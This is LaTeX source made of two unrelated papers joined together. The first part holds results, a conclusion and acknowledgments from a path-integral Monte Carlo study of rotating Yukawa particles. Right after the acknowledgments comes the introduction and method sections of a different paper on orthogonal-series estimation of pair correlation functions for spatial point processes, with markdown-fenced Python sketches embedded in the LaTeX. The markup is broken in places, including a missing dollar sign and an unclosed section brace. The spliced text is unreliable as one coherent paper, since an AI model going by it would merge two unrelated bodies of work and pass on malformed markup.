the temperature is still small on the interaction energy scale; $\tilde\beta$ is on the scale of $10^2$.
(In the absence of flux, Ref.~\cite{Nordborg97} finds essentially ground-state behavior at $\tilde\beta\approx300$.)
\begin{figure*}[htbp]
\begin{center}
\includegraphics[width=0.32\textwidth, keepaspectratio]{fermia.eps}
\includegraphics[width=0.32\textwidth, keepaspectratio]{fermib.eps}
\includegraphics[width=0.32\textwidth, keepaspectratio]{fermic.eps}
\vspace*{0.1cm}
\includegraphics[width=0.32\textwidth, keepaspectratio]{fermid.eps}
\includegraphics[width=0.32\textwidth, keepaspectratio]{fermie.eps}
\includegraphics[width=0.32\textwidth, keepaspectratio]{fermif.eps}
\vspace*{0.1cm}
\includegraphics[width=0.32\textwidth, keepaspectratio]{fermig.eps}
\includegraphics[width=0.32\textwidth, keepaspectratio]{fermih.eps}
\includegraphics[width=0.32\textwidth, keepaspectratio]{fermii.eps}
\end{center}
\caption{(Color online)\label{fig:fermi}
\textit{Second row (d-f)}: the pair-correlation function for $N=16$ fermions at density $\rho a^2=0.02$ ($\kappa=0.25066$),
at filling factor $\nu=2$ (i.e., $N_\phi=8$ flux quanta piercing the torus) and interaction strength $\Lambda=0.035$
at inverse temperature $\beta^\ast=0.4$, 0.5, and 0.6, respectively.
In (d) $M=16$ slices were used, $\tau=0.025$ and $\tilde\beta=132$;
in (e) $M=16$, $\tau=0.03125$ and $\tilde\beta=114$;
in (f) $M=24$, $\tau=0.025$ and $\tilde\beta=99$.
Panels (a) and (c) show the difference of the pair-correlation functions between the colder and the warmer system
shown in consecutive panels in the second row.
The triangular lattice of bright spots testifies to the increasing crystalline correlations as the temperature is decreased.
\textit{Second column (b,e,h)}: the pair-correlation function as the temperature is held fixed at $\beta^\ast=0.5$, but the
de Boer parameter is tuned from $\Lambda=0.03$ in panel (h) to $\Lambda=0.04$ in panel (b).
Panels (g) and (i) show the difference of the pair-correlation functions as $\Lambda$ is changed
from 0.03 to 0.035, and from 0.035 to 0.04, respectively,
for systems shown in the second column.
The triangular lattice of dark spots testifies to the decreasing crystalline correlations as $\Lambda$ is increased.
}
\end{figure*}
It is customary to characterize the crystalline order by the Lindemann ratio
$\gamma = \sqrt{\frac{1}{N}\sum_{i=1}^N\left\langle (\mathbf r_i - \mathbf R_i)^2\right\rangle}/d$,
where $d$ is the lattice constant and $\mathbf R_i$ is the lattice point nearest to particle $i$.
In our case, however, we cannot hold the center of mass fixed during Monte Carlo, because the
simultaneous shift of all beads by the same vector is not a symmetry,
except for some discrete values, as discussed in Sec.~\ref{sec:freedm}.
One could locate the lattice points with reference to the instantaneous center of mass
assuming the lattice is triangular with the lattice constant implied by the density.
But this procedure underestimates $\gamma$.
Hence, we decided to infer the qualitative behavior from the pair-correlation function instead.
By inspecting the difference of the pair-correlation functions of systems that differ only by one
parameter, we have checked that in the $\beta^\ast<1$ range our method reproduces the
tendencies known for the nonrotating system:
(i) the crystalline tendency becomes stronger with increasing $\beta^\ast$ at fixed $\Lambda$ and $\rho^\ast$,
as seen in the related panels of Figs.~\ref{fig:bose}, \ref{fig:fermi} and \ref{fig:nonmon2}, and
(ii) it becomes stronger when decreasing $\Lambda$ at fixed $\beta^\ast$ and $\rho^\ast$.
Also, Fermi systems show stronger peaks in the pair-correlation than Bose systems at identical temperature,
density, and de Boer parameter $\Lambda$.
It is not possible to go beyond qualitative statements now, as neither finite-size scaling nor a
$\tau\to0$ extrapolation has been performed.
With the prior knowledge that the melting transition is first-order, it will be necessary to
perform simulations with the particle density as a dynamical variable \cite{Nordborg97}.
As our goal is to demonstrate the applicability of PIMC to bulk systems in the absence of
time-reversal symmetry, and not an in-depth analysis of the Yukawa system,
we delegate such a quantitative analysis to future work.
\begin{figure}[htbp]
\begin{center}
\includegraphics[width=\columnwidth, keepaspectratio]{fpeak.eps}
\end{center}
\caption{\label{fig:density}(Color online)
The height of the first peak of the pair-correlation function for $N=12$ fermions at $\beta^\ast=0.5$ and
$N_\phi=6$, for various values of the de Boer parameter $\Lambda$, as a function of the density $\rho a^2$.
The nonmonotonic evolution indicates that crystalline order exists only for a
limited range of densities.}
\end{figure}
For $\Omega=0$, Yukawa bosons are known to exhibit nonmonotonic behavior as a function of density:
at fixed interaction strength $\Lambda$ the system first crystallizes with increasing density,
then at sufficiently high density it melts again.
Due to computational limitations, we have only been able to verify this for the Fermi system.
Fig.~\ref{fig:density} shows the evolution of the first peak of the pair-correlation function as the density changes
at fixed $\beta^\ast$ and $\Lambda$ values for fermions.
Apparently, crystalline order prevails only for intermediate densities, just like for bosons
at zero temperature in the absence of rotation \cite{Magro93}.
Determining the phase boundary will require more extensive simulations.
In the $\beta^\ast>1$ range the strength of the crystalline correlations apparently
starts to weaken as a function of the inverse temperature for fermions.
Such an evolution is shown in Fig.~\ref{fig:nonmon2} for various de Boer interaction
parameters $\Lambda$ as the temperature is tuned from $\beta^\ast=0.1$ to 1.2.
The pair-correlation becomes more crystalline in the $\beta^\ast\lesssim0.6$ range,
then stagnates, and seems to weaken again above $\beta^\ast\approx1$.
Clearly, more comprehensive calculations in the large-$\beta$ region are necessary to ascertain that
this tendency is robust.
If so, it indicates the competition of the homogeneous integer quantum Hall liquid state (the ground-state
candidate for this particular density) and the density-wave ordering,
which requires thermal excitations above the cyclotron gap that the interaction can organize into a crystalline order.
This competition is, of course, not expected for bosons or boltzmannons;
for the latter we have checked the monotonic evolution up to $\beta^\ast=1.8$.
\begin{figure}[htbp]
\begin{center}
\includegraphics[width=\columnwidth, keepaspectratio]{tempfpeak.eps}
\end{center}
\caption{(Color online)\label{fig:nonmon2}
The evolution of the first peak of the pair-correlation function for $N=16$ fermions at flux $N_\phi=8$
at density $\rho a^2=0.02$ ($\kappa=0.25066)$, as a function of the inverse temperature
for some values of the de Boer parameter $\Lambda$ for which crystalline structure is manifest
at intermediate temperatures.
A small horizontal shift has been applied to the last two curves to make the overlapping error bars visible.
}
\end{figure}
It is also interesting to review the evolution of the pair-correlation as a function
of flux density (magnetic field or Coriolis-force) when the particle density $\rho^\ast$ is held fixed.
Again, we could study this only for fermions and boltzmannons; some of the results are shown in Fig.~\ref{fig:flux}.
(Notice that while $\beta^\ast$ is kept constant, the system becomes colder on the interaction
energy scale as $\tilde\beta=\beta^\ast\nu/(4\pi\Lambda\rho^\ast)$ with $\nu=N/N_\phi$;
the ratio of the interaction and the magnetic length scale also changes as $\kappa=\sqrt{2\pi\rho^\ast/\nu}$.)
We see that the system becomes more crystalline as the number of flux quanta is decreased,
which is only possible in very crude steps with $N=16$, the largest system we simulated routinely.
The tendency is qualitatively the same for fermions and boltzmannons, but it is stronger for fermions.
Note that the flux density would localize particles on the scale of the magnetic length,
which is greater than the lattice constant for $\kappa<1$.
On the other hand, it is more difficult to obtain converged results for smaller flux densities,
which is no doubt related to the shortening of the length scale on which the change of the
phase of the many-body wave function can be considered smooth in the phase-fixing procedure;
in the limit of vanishing magnetic field, we approach the sudden sign changes that
are treated by node fixing in time-reversal-symmetric simulations.
\begin{figure}[htbp]
\begin{center}
\includegraphics[width=\columnwidth, keepaspectratio]{fluxfermib.eps}
\includegraphics[width=\columnwidth, keepaspectratio]{fluxbolzmannb.eps}
\end{center}
\caption{(Color online)\label{fig:flux}
The difference $g_{N_\phi=2}(\mathbf r)-g_{N_\phi=6}(\mathbf r)$ between pair-correlation functions at
different flux densities (6 and 2 flux quanta through the torus) at $\beta^\ast=0.5$ for $N=16$ and
\rho a^2=0.02$ for fermions (a) and boltzmannons (b).
The total area of the simulation cell is scaled to unity, thus the peak locations may coincide.
(The filling factor corresponding to $N_\phi=6,2$ is $\nu=\frac{8}{3},8$, respectively.)
The triangular lattice of bright peaks corresponds to stronger crystalline correlations at smaller flux density.
Boltzmannons in panel (b) are still liquid-like; a small rotation of the hexagonally distorted
rings away from the directions where crystalline structure will emerge can be attributed to imperfect thermalization.
}
\end{figure}
We note that the PIMC calculations for $N=12$ bosons in Fig.~\ref{fig:bose} required about one day of thermalization
and two days of data collection on a single Intel Xeon X5660 CPU core at 2.8 GHz,
while the calculations for $N=16$ fermions in Fig.~\ref{fig:fermi} were about half that long.
With increasing inverse temperature the number of slices also has to be increased; the most expensive
calculation we performed was for $\beta=1.1$ in Fig.~\ref{fig:nonmon2}, with three days of thermalization and
eleven days of data collection.
The number of flux quanta hardly affects the resources needed: each of the calculations compared in Fig.~\ref{fig:flux}(a)
required about three plus six days; the calculations for distinguishable particles in Fig.~\ref{fig:flux}(b) were about
a factor of three cheaper.
As the computational cost of PIMC scales as a moderate power, typically $N^3$, of the system size, and no attempt has yet been
made to parallelize the code, we expect that we can routinely simulate dozens of particles with the method elaborated here.
\section{Conclusion and Outlook}
\label{conclusion}
We have explored the feasibility of the path-integral Monte Carlo simulation of systems
that do not obey time-reversal symmetry under periodic boundary conditions.
Technically, this requires the use of the single-particle thermal density matrix
that is appropriate for the boundary conditions in the presence of a magnetic field.
We have derived several equivalent closed-form expressions for this purpose.
The multi-slice sampling algorithm was modified for the case where the
weight of a path is determined by the magnitude of the density matrix, which does
not obey a convolution property.
We have illustrated the use of these techniques in the simulation of two-dimensional Yukawa systems,
where time-reversal symmetry is broken by the Coriolis force,
as is common in experiments on cold atomic systems.
We have shown that in spite of the crudeness of the phase-fixing we used, the
interaction-driven transition between a crystalline phase and a correlated liquid
can be captured qualitatively by a PIMC simulation.
A comprehensive quantitative study of this system is delegated to future work.
Ultimately, fermions that interact by the Coulomb potential are of more fundamental interest.
For such systems the primitive approximation to the action is clearly not an adequate starting point.
More sophisticated approximations exist, but in their current form they rely upon the
consequences of time-reversal invariance.
The development of suitable approximations for the non-time-reversal-invariant case is underway and is
delegated to future publications.
\begin{acknowledgments}
This research was supported by the National Research Development and Innovation Office of Hungary
within the Quantum Technology National Excellence Program (Project No.\ 2017-1.2.1-NKP-2017-00001),
and by the Hungarian Scientific Research Funds No.\ K105149.
We are grateful to the HPC facility at the Budapest University of Technology and Economics.
We thank P\'eter L\'evay and Bal\'azs Het\'enyi for useful discussions.
C.\ T.\ was supported by the Hungarian Academy of Sciences.
H.\ G.\ T.\ acknowledges support from the ``Quantum Computing and Quantum Technologies'' PhD School of
the University of Basel.
\end{acknowledgments}
\section{Introduction}
\label{sec:intro}
The pair correlation function is commonly considered the most
informative second-order summary statistic of a spatial point process
\citep{stoyan:stoyan:94,moeller:waagepetersen:03,illian:penttinen:stoyan:stoyan:08}.
Non-parametric estimates of the pair correlation function are useful
for assessing regularity or clustering of a spatial point pattern and
can moreover be used for inferring parametric models for spatial point
processes via minimum contrast estimation
\citep{stoyan:stoyan:96,illian:penttinen:stoyan:stoyan:08}.
Although alternatives exist \citep{yue:loh:13}, kernel estimation
is by far the most popular approach
\citep{stoyan:stoyan:94,moeller:waagepetersen:03,illian:penttinen:stoyan:stoyan:08}
which is closely related to kernel estimation of probability
densities.
Kernel estimation is computationally fast and works well except at small
spatial lags. For spatial lags close to zero, kernel estimators suffer
from strong bias, see e.g.\ the discussion at page 186 in
\cite{stoyan:stoyan:94}, Example~4.7 in
\cite{moeller:waagepetersen:03} and Section 7.6.2 in \cite{baddeley:rubak:turner:15}.
The bias is a major drawback if one attempts
to infer a parametric model from the non-parametric estimate since the
behavior
near zero is important for
determining the right parametric model \citep{jalilian:guan:waagepetersen:13}.
In this paper we adapt orthogonal series density estimators
\citep[see e.g.\ the reviews in][]{hall:87,efromovich:10}
to the estimation of the pair correlation function. We derive unbiased
estimators of the coefficients in an orthogonal series expansion of the
pair correlation function and propose a criterion for choosing a certain
optimal smoothing scheme. In the literature on orthogonal series
estimation of probability densities, the data are usually
assumed to consist of independent observations from the unknown
target density. In our case the situation is more complicated as the
data used for estimation consist of spatial lags between observed pairs of
points. These lags are neither independent nor identically distributed and the sample of lags is
biased due to edge effects.
We establish consistency and asymptotic normality of our new
orthogonal series estimator and study its performance in a simulation
study and an application to a tropical rain forest data set.
\section{Background
\label{sec:background}
\subsection{Spatial point processes}
We denote by $X$ a point process on ${\mathbb R}^d$, $d \ge 1$, that is, $X$ is
a locally finite random subset of ${\mathbb R}^d$. For $B\subseteq {\mathbb R}^d$, we let $N(B)$
denote the random number of points in $X \cap B$. That $X$ is locally finite
means that $N(B)$ is finite almost surely whenever $B$ is bounded. We
assume that $X$ has an intensity function $\rho$ and a second-order
joint intensity $\rho^{(2)}$ so that for bounded $A,B \subset {\mathbb R}^d$,
\begin{equation}
E\{N(B)\} = \int_B \rho(u) {\mathrm{d}} u, \quad
E\{N(A) N(B)\} = \int_{A\cap B} \rho(u) {\mathrm{d}} u
+ \int_A \int_B \rho^{(2)}(u,v) {\mathrm{d}} u {\mathrm{d}} v. \label{eq:moments}
\end{equation}
The pair correlation function $g$ is defined as
$g(u,v) = \rho^{(2)}(u,v)/\{\rho(u) \rho(v)\}$
whenever $\rho(u)\rho(v)>0$ (otherwise we define $g(u,v)=0$).
By \eqref{eq:moments},
\[
\text{cov}\{ N(A), N(B) \} = \int_{A \cap B} \rho(u) {\mathrm{d}} u +
\int_{A}\int_{B} \rho(u)\rho(v)\big\{ g(v,u) - 1 \big\} {\mathrm{d}} u {\mathrm{d}} v
\]
for bounded $A,B \subset {\mathbb R}^d$.
Hence, given the intensity function, $g$ determines
the covariances of count variables $N(A)$ and $N(B)$. Further, for
locations $u,v \in {\mathbb R}^d$, $g(u,v)>1$ ($<1$)
implies that the presence of a point at $v$ yields an elevated
(decreased) probability of observing yet another point in a small
neighbourhood of $u$ \cite[e.g.\ ][]{coeurjolly:moeller:waagepetersen:15}.
In this paper we assume that $g$ is isotropic, i.e.\ with
an abuse of notation, $g(u,v)=g(\|v-u\|)$.
Examples of pair correlation functions are shown in Figure~\ref{fig:gfuns}.
\subsection{Kernel estimation of the pair correlation function}
Suppose $X$ is observed within a bounded observation window $W
\subset {\mathbb R}^d$ and let $X_W= X \cap W$. Let $k_b(\cdot)$ be a
kernel of the form $k_b(r)=k(r/b)/b$, where $k$ is a
probability density
and
$b>0$ is the bandwidth.
Then a kernel density
estimator \citep{stoyan:stoyan:94,baddeley:moeller:waagepetersen:00} of $g$ is
\[
\hat{g}_k(r;b) = \frac{1}{{\text{sa}_d} r^{d-1}}
\sum_{u,v\in X_{W}}^{\neq}
\frac{ k_{b}(r - \|v - u\|)}{ \rho(u) \rho(v)|W \cap W_{v-u}|},
\quad r\geq 0,
\]
where ${\text{sa}_d}$ is the surface area of the unit sphere in ${\mathbb R}^d$,
$\sum^{\neq}$ denotes the sum over all pairs of distinct points,
$1/|W \cap W_{h}|$, $h \in {\mathbb R}^d$,
is the translation edge correction factor with
$W_{h}=\{u-h : u\in W\}$, and $|A|$ is the volume (Lebesgue measure)
of $A\subset{\mathbb R}^{d}$.
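For concreteness, the weighting in $\hat g_k$ can be sketched in a few lines of numpy for $d=2$, the uniform kernel, a pre-evaluated intensity and the translation edge correction on a rectangular window $W=[0,a_1]\times[0,a_2]$. This is our own illustrative sketch, not code from any package; function names are ours.

```python
import numpy as np

def edge_corr(h, sides):
    """|W ∩ W_h| for a rectangular window W = [0, a_1] x [0, a_2]."""
    return np.prod(np.maximum(sides - np.abs(h), 0.0), axis=-1)

def pcf_kernel(points, rho, r, b, sides=(1.0, 1.0)):
    """Translation-corrected kernel estimator g_k(r; b) in d = 2 with the
    uniform kernel k(t) = 1(|t| <= 1)/2, i.e. k_b(t) = 1(|t| <= b)/(2b).
    points: (n, 2) array; rho: intensity evaluated at each point."""
    sides = np.asarray(sides, float)
    diff = points[:, None, :] - points[None, :, :]   # pairwise lags v - u
    dist = np.hypot(diff[..., 0], diff[..., 1])
    n = len(points)
    off = ~np.eye(n, dtype=bool)                     # distinct pairs only
    kb = (np.abs(r - dist) <= b) / (2.0 * b)         # uniform kernel weight
    w = kb / (rho[:, None] * rho[None, :] * edge_corr(diff, sides))
    return w[off].sum() / (2.0 * np.pi * r)          # sa_2 = 2*pi
```

For real data one would of course use an established implementation such as \texttt{spatstat}'s \texttt{pcf}; the sketch only makes the terms of the formula explicit.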
Variations of this include \citep{guan:leastsq:07}
\[
\hat{g}_d(r;b) =\frac{1}{{\text{sa}_d}} \sum_{u,v\in X_{W}}^{\neq}
\frac{ k_{b}(r - \|v - u\|) }{ \|v - u\|^{d-1} \rho(u) \rho(v)|W \cap W_{v-u}|},
\quad r \geq 0 \]
and the bias corrected estimator \citep{guan:leastsq:07}
\[
\hat g_c(r;b) = \hat g_d(r;b) / c(r;b), \quad
c(r;b) = \int_{-b}^{\min\{r,b\}} k_b(t) {\mathrm{d}} t,
\]
assuming $k$ has bounded support $[-1,1]$.
Regarding the choice of kernel,
\cite{illian:penttinen:stoyan:stoyan:08}, p.~230, recommend using the
uniform kernel $k(r)=\mathbbm{1}(|r|\le 1)/2$, where $\mathbbm{1}(\, \cdot\, )$
denotes the indicator function, but the Epanechnikov kernel $k(r)=(3/4)(1 - r^2)\mathbbm{1}(|r|\leq1)$
is another common choice.
The choice of the bandwidth $b$ strongly affects
the bias and variance of the kernel estimator.
In the planar ($d=2$) stationary case,
\cite{illian:penttinen:stoyan:stoyan:08}, p.~236,
recommend $b=0.10/\surd{\hat{\rho}}$ based on practical experience, where $\hat{\rho}$ is an estimate
of the constant intensity. The default in \texttt{spatstat} \citep{baddeley:rubak:turner:15}, following
\cite{stoyan:stoyan:94}, is to use
the Epanechnikov kernel with $b=0.15/\surd{\hat{\rho}}$.
\cite{guan:composite:07} and \cite{guan:leastsq:07}
suggest choosing $b$ by composite
likelihood cross validation or by
minimizing an estimate of the mean integrated squared error defined over some interval $I$ as
\begin{equation}\label{eq:mise}
\textsc{mise}(\hat{g}_m, w) ={\text{sa}_d} \int_I
E\big\{ \hat{g}_m(r;b) - g(r)\big\}^2 w(r-{r_{\min}}) {\mathrm{d}} r,
\end{equation}
where $\hat g_{m}$, $m=k,d,c$, is one of the aforementioned kernel
estimators, $w\ge 0$ is a weight function and ${r_{\min}} \ge 0$.
With $I=(0,R)$, $w(r)=r^{d-1}$ and $r_{\min}=0$,
\cite{guan:leastsq:07} suggests estimating the mean integrated squared error by
\begin{equation}\label{eq:ywcv}
M(b) = {\text{sa}_d} \int_{0}^{R}
\big\{ \hat{g}_{m}(r;b) \big\}^2 r^{d-1} {\mathrm{d}} r
-2 \sum_{\substack{u,v\in X_{W}\\ \|v-u\| \le R}}^{\neq}
\frac{\hat{g}_{m}^{-\{u,v\}}(\|v-u\|;b)}{
\rho(u) \rho(v)|W \cap W_{v-u}|},
\end{equation}
where $\hat{g}_m^{-\{u,v\}}$, $m=k,d,c$, is defined as $\hat g_m$
but based on the reduced data $(X \setminus \{u,v\}) \cap$
W$. \cite{loh:jang:10} instead use a spatial bootstrap for
estimating \eqref{eq:mise}. We return to \eqref{eq:ywcv} in Section~\ref{sec:miseest}.
\section{Orthogonal series estimation}\label{sec:ose}
\subsection{The new estimator}
For an $R>0$, the new orthogonal series estimator of $g(r)$,
$0\le {r_{\min}} < r < {r_{\min}} + R$, is based on an orthogonal series
expansion of $g(r)$ on $({r_{\min}}, {r_{\min}} + R)$ :
\begin{equation}\label{eq:expansion}
g(r) = \sum_{k=1}^{\infty} \theta_k \phi_k(r-{r_{\min}}),
\end{equation}
where $\{\phi_k\}_{k \ge 1}$ is an orthonormal basis of functions on
$(0, R)$ with respect to some weight function $w(r) \ge 0$, $r \in (0, R)$.
That is, $\int_{0}^R \phi_k(r) \phi_l(r) w(r) {\mathrm{d}} r = \mathbbm{1}(k=l)$
and the coefficients in the expansion are given by $\theta_k
=\int_{0}^{R} g(r+{r_{\min}}) \phi_k(r) w(r) {\mathrm{d}} r$.
For the cosine basis, $w(r)=1$ and $\phi_1(r) = 1/\surd{R}$, $\phi_k(r)= (2/R)^{1/2} \cos\{ (k - 1) \pi r/R \}$, $k \ge 2$. Another example is the Fourier-Bessel basis with $w(r)= r^{d-1}$
and $ \phi_k(r)=2^{1/2}J_{\nu}\left(r \alpha_{\nu,k}/R
\right)r^{-\nu}/\{ RJ_{\nu+1}(\alpha_{\nu,k})\}$, $k \ge 1$,
where $\nu=(d-2)/2$, $J_{\nu}$ is the Bessel function of the first kind of
order $\nu$, and $\{\alpha_{\nu,k}\}_{k=1}^\infty$ is the sequence of
successive positive roots of $J_{\nu}(r)$.
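The orthonormality relation $\int_{0}^R \phi_k(r) \phi_l(r) w(r) {\mathrm{d}} r = \mathbbm{1}(k=l)$ is easy to check numerically. The following is our own sanity-check sketch for the cosine basis ($w\equiv 1$), using a midpoint rule on $(0,R)$:

```python
import numpy as np

def cosine_basis(k, r, R):
    """Cosine basis on (0, R) with weight w(r) = 1:
    phi_1 = 1/sqrt(R), phi_k = sqrt(2/R) cos((k-1) pi r / R) for k >= 2."""
    if k == 1:
        return np.full_like(r, 1.0 / np.sqrt(R))
    return np.sqrt(2.0 / R) * np.cos((k - 1) * np.pi * r / R)

R = 0.125
N = 20000
r = (np.arange(N) + 0.5) * R / N   # midpoint grid on (0, R)
# Gram matrix of the first five basis functions; should be close to I_5
gram = np.array([[np.sum(cosine_basis(k, r, R) * cosine_basis(l, r, R)) * R / N
                  for l in range(1, 6)] for k in range(1, 6)])
```

The same check applies to the Fourier-Bessel basis with $w(r)=r^{d-1}$, given a routine for $J_\nu$ and its zeros (e.g. \texttt{scipy.special}).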
An estimator of $g$ is obtained by replacing the $\theta_k$ in \eqref{eq:expansion}
by unbiased estimators and
truncating or smoothing the infinite sum. A similar approach has a
long history in the context of non-parametric estimation of
probability densities, see e.g.\ the review in \citet{efromovich:10}.
For $\theta_k$ we propose the estimator
\begin{equation}\label{eq:thetahat}
\hat \theta_k=\frac{1}{{\text{sa}_d}} \sum_{\substack{u,v\in X_{W}\\ {r_{\min}} < \|u - v\| < {r_{\min}}+R}}^{\neq}
\frac{\phi_k(\|v-u\|-{r_{\min}}) w(\|v-u\|-{r_{\min}})}{\rho(u) \rho(v) \|v-u\|^{d-1}|W \cap W_{v-u}|},
\end{equation}
which is unbiased by the second order Campbell formula, see Section~S2 of the supplementary
material.
This type of estimator has some similarity to the coefficient estimators used for probability
density estimation but is based on spatial lags $v-u$ which are
neither independent nor identically distributed. Moreover the estimator is
adjusted for the possibly inhomogeneous intensity $\rho$ and corrected
for edge effects.
The orthogonal series estimator is finally of the form
\begin{equation}\label{eq:orthogpcf}
\hat g_o(r; b) = \sum_{k=1}^{\infty} b_k \hat \theta_k \phi_k(r-{r_{\min}}),
\end{equation}
where $b=\{ b_k \}_{k=1}^\infty$ is a smoothing/truncation scheme.
The simplest smoothing scheme is $b_k=\mathbbm{1}[k \le K]$ for some cut-off
$K\geq1$. Section~\ref{sec:smoothing} considers several other smoothing schemes.
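The coefficient estimator \eqref{eq:thetahat} and the truncated series \eqref{eq:orthogpcf} can be sketched directly. The code below is our own illustration for $d=2$, the cosine basis ($w\equiv 1$), a rectangular window and the simple truncation scheme $b_k=\mathbbm{1}(k\le K)$; names and interfaces are ours.

```python
import numpy as np

def theta_hat(points, rho, k, rmin, R, sides=(1.0, 1.0)):
    """Unbiased coefficient estimator for the cosine basis, d = 2, w(r) = 1,
    with translation edge correction on W = [0, a_1] x [0, a_2]."""
    sides = np.asarray(sides, float)
    diff = points[:, None, :] - points[None, :, :]
    dist = np.hypot(diff[..., 0], diff[..., 1])
    # pairs of distinct points with r_min < ||v - u|| < r_min + R
    i, j = np.nonzero((dist > rmin) & (dist < rmin + R))
    h, d_ij = diff[i, j], dist[i, j]
    if k == 1:
        phi = np.full_like(d_ij, 1.0 / np.sqrt(R))
    else:
        phi = np.sqrt(2.0 / R) * np.cos((k - 1) * np.pi * (d_ij - rmin) / R)
    edge = np.prod(np.maximum(sides - np.abs(h), 0.0), axis=-1)
    # ||v - u||^{d-1} = d_ij for d = 2; sa_2 = 2*pi
    return np.sum(phi / (rho[i] * rho[j] * d_ij * edge)) / (2.0 * np.pi)

def g_hat(points, rho, r, K, rmin, R, sides=(1.0, 1.0)):
    """Truncated estimator g_o(r) = sum_{k <= K} theta_hat_k phi_k(r - rmin)."""
    out = 0.0
    for k in range(1, K + 1):
        phi_r = (1.0 / np.sqrt(R) if k == 1
                 else np.sqrt(2.0 / R) * np.cos((k - 1) * np.pi * (r - rmin) / R))
        out += theta_hat(points, rho, k, rmin, R, sides) * phi_r
    return out
```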
\subsection{Variance of $\hat \theta_k$}
\label{sec:varthetak}
The factor $\|v-u\|^{d-1}$ in \eqref{eq:thetahat} may
cause problems when $d>1$ where the presence of two
very close points in $X_W$ could imply
division by a quantity close to zero.
The expression for the variance of $\hat \theta_k$ given in Section~S2 of the supplementary
material
indeed shows that the variance is not finite
unless $g(r)w(r-{r_{\min}})/r^{d-1}$ is bounded for ${r_{\min}}<r<{r_{\min}}+R$. If ${r_{\min}}>0$ this is always satisfied for bounded $g$. If ${r_{\min}}=0$ the condition is still satisfied in case of the Fourier-Bessel basis and bounded $g$.
For the cosine basis $w(r)=1$ so if ${r_{\min}}=0$ we need
the boundedness of $g(r)/r^{d-1}$.
If $X$ satisfies a hard core condition
(i.e.\ two points in $X$ cannot be closer than some
$\delta>0$), this is trivially satisfied. Another
example is a determinantal point process \citep{LMR15} for
which $g(r)=1-c(r)^2$ for a correlation function $c$. The boundedness
is then e.g.\ satisfied if $c(\cdot)$ is the
Gaussian ($d \le 3$) or exponential ($d \le 2$) correlation function.
In practice, when using the cosine basis, we take ${r_{\min}}$ to be a small positive number to avoid issues with infinite variances.
\subsection{Mean integrated squared error and smoothing schemes}
\label{sec:smoothing}
The orthogonal series estimator \eqref{eq:orthogpcf}
has the mean integrated squared error
\begin{align}
\textsc{mise}\big(\hat{g}_{o},w\big)
&= {\text{sa}_d} \int_{{r_{\min}}}^{{r_{\min}}+R}
E\big\{ \hat{g}_{o}(r;b) - g(r) \big\}^2 w(r-{r_{\min}}) {\mathrm{d}} r \nonumber \\
&= {\text{sa}_d} \sum_{k=1}^{\infty} E(b_k\hat{\theta}_{k} - \theta_k)^2
= {\text{sa}_d} \sum_{k=1}^{\infty} \big[ b_{k}^2 E\{(\hat{\theta}_{k})^2\}
-2b_k \theta_{k}^2 + \theta_{k}^2 \big]. \label{eq:miseo}
\end{align}
Each term in~\eqref{eq:miseo} is minimized with $b_k$ equal
to \citep[cf.][]{hall:87}
\begin{equation}\label{eq:bstar}
b_{k}^{*} = \frac{\theta_{k}^2}{E\{(\hat{\theta}_{k})^2\} }
=\frac{\theta_{k}^2}{\theta_{k}^2 + \text{var}(\hat{\theta}_{k})},
\quad k\geq1,
\end{equation}
leading to the minimal value ${\text{sa}_d}\sum_{k=1}^{\infty} b_{k}^{*}
\text{var}(\hat{\theta}_{k})$ of the mean integrated square error. Unfortunately, the $b_k^*$ are unknown.
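To make the shrinkage explicit: since $\hat\theta_k$ is unbiased, the risk of a single shrunken coefficient is $E(b\hat\theta_k-\theta_k)^2 = b^2(\theta_k^2+\text{var}\,\hat\theta_k) - 2b\theta_k^2 + \theta_k^2$, and \eqref{eq:bstar} is its minimizer. The following small numerical illustration (our own, with arbitrary values of $\theta_k^2$ and the variance) confirms this:

```python
import numpy as np

def risk(b, theta2, var):
    """Risk b^2 (theta^2 + var) - 2 b theta^2 + theta^2 of a shrunken
    unbiased coefficient estimate b * theta_hat."""
    return b**2 * (theta2 + var) - 2.0 * b * theta2 + theta2

theta2, var = 0.8, 0.3                 # illustrative values only
b_star = theta2 / (theta2 + var)       # optimal weight, cf. eq. (bstar)
grid = np.linspace(0.0, 1.0, 1001)
# b_star attains (approximately) the minimum of risk over the grid,
# with minimal risk b_star * var, and beats no shrinkage (b = 1)
```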
In practice we consider a parametric class of smoothing schemes $b(\psi)$. For practical
reasons we need a finite sum in \eqref{eq:orthogpcf} so one component
in $\psi$ will be a cut-off index $K$ so that $b_k(\psi)=0$ when
$k>K$. The simplest smoothing scheme is
$b_k(\psi)=\mathbbm{1}(k\le K)$. A more refined scheme is
$b_k(\psi)=\mathbbm{1}(k\le K)\hat b_k^*$ where $\hat b_k^* = \widehat{\theta_k^2}/(\hat
\theta_k)^2$ is an estimate of the optimal smoothing coefficient
$b_k^*$ given in \eqref{eq:bstar}. Here $\widehat{\theta_k^2}$
is an asymptotically unbiased estimator of $\theta_k^2$ derived
in Section~\ref{sec:miseest}. For these two smoothing schemes
$\psi=K$. Adapting the scheme suggested by \cite{wahba:81},
we also consider $\psi=(K,c_1,c_2)$, $c_1>0,c_2>1$,
and $b_k(\psi)=\mathbbm{1}(k\le K)/(1 + c_1 k^{c_2})$.
In practice we choose the smoothing parameter $\psi$ by minimizing
an estimate of the mean integrated squared error, see Section~\ref{sec:miseest}.
\subsection{Expansion of $g(\cdot)-1$}\label{sec:g-1}
For large $R$, $g({r_{\min}}+R)$ is typically close to one. However, for the Fourier-Bessel basis,
$\phi_k(R)=0$ for all $k \ge 1$ which implies $\hat g_o({r_{\min}}+R)=0$.
Hence the estimator cannot be consistent for $r={r_{\min}}+R$ and the
convergence of the estimator for $r \in ({r_{\min}},{r_{\min}}+R)$ can be quite
slow as the number of terms $K$ in the estimator increases.
In practice we obtain quicker convergence by applying the Fourier-Bessel
expansion to $g(r)-1=\sum_{k \ge 1} \vartheta_{k} \phi_k(r-{r_{\min}})$
so that the estimator becomes $\tilde g_o(r;b)=1+ \sum_{k=1}^{\infty}
b_k\hat{\vartheta}_{k} \phi_k(r-{r_{\min}})$ where $\hat{\vartheta}_k = \hat
\theta_k - \int_{0}^{{r_{\min}}+R} \phi_k(r) w(r) {\mathrm{d}} r$ is an estimator
of $\vartheta_k = \int_{0}^R \{ g(r+{r_{\min}})-1 \} \phi_k(r) w(r) {\mathrm{d}}
r$. Note that $\text{var}(\hat{\vartheta}_k)=\text{var}(\hat{\theta}_k)$
and $\tilde g_o(r;b)- E\{\tilde{g}_o(r;b)\}= \hat g_o(r;b)- E\{\hat g_o(r;b)\}$.
